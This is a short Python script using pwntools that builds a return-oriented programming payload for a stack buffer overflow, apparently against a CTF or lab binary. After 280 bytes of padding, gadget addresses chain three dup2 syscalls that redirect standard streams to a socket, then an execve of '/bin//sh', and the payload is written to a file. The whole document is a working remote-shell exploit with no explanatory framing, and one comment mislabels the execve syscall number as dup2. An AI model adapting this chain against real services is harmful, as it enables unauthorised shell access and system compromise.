from pwn import *

from struct import pack

# Padding goes here
p = b'A' * 280

# dups
p += p64(0x00000000004021dc)  # pop rax ; ret
p += p64(33)  # dup2
p += pack('<Q', 0x00000000004022ff) # pop rdi ; ret
p += p64(5)
p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += p64(0)
p += p64(0x000000000041b076) # syscall; ret

p += p64(0x00000000004021dc)  # pop rax ; ret
p += p64(33)  # dup2
p += pack('<Q', 0x00000000004022ff) # pop rdi ; ret
p += p64(5)
p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += p64(1)
p += p64(0x000000000041b076) # syscall; ret

p += p64(0x00000000004021dc)  # pop rax ; ret
p += p64(33)  # dup2
p += pack('<Q', 0x00000000004022ff) # pop rdi ; ret
p += p64(5)
p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += p64(2)
p += p64(0x000000000041b076) # syscall; ret

p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e0) # @ .data
p += pack('<Q', 0x00000000004021dc) # pop rax ; ret
p += b'/bin//sh'
p += pack('<Q', 0x0000000000453915) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x000000000043f2f9) # xor rax, rax ; ret
p += pack('<Q', 0x0000000000453915) # mov qword ptr [rsi], rax ; ret
p += pack('<Q', 0x00000000004022ff) # pop rdi ; ret
p += pack('<Q', 0x00000000004c70e0) # @ .data
p += pack('<Q', 0x000000000040a36e) # pop rsi ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x00000000004021d6) # pop rdx ; ret
p += pack('<Q', 0x00000000004c70e8) # @ .data + 8
p += pack('<Q', 0x000000000043f2f9) # xor rax, rax ; ret
p += p64(0x00000000004021dc)  # pop rax ; ret
p += p64(59)  # dup2
p += pack('<Q', 0x000000000040198e) # syscall


with open('pl_internal', 'wb') as fd:
    fd.write(p)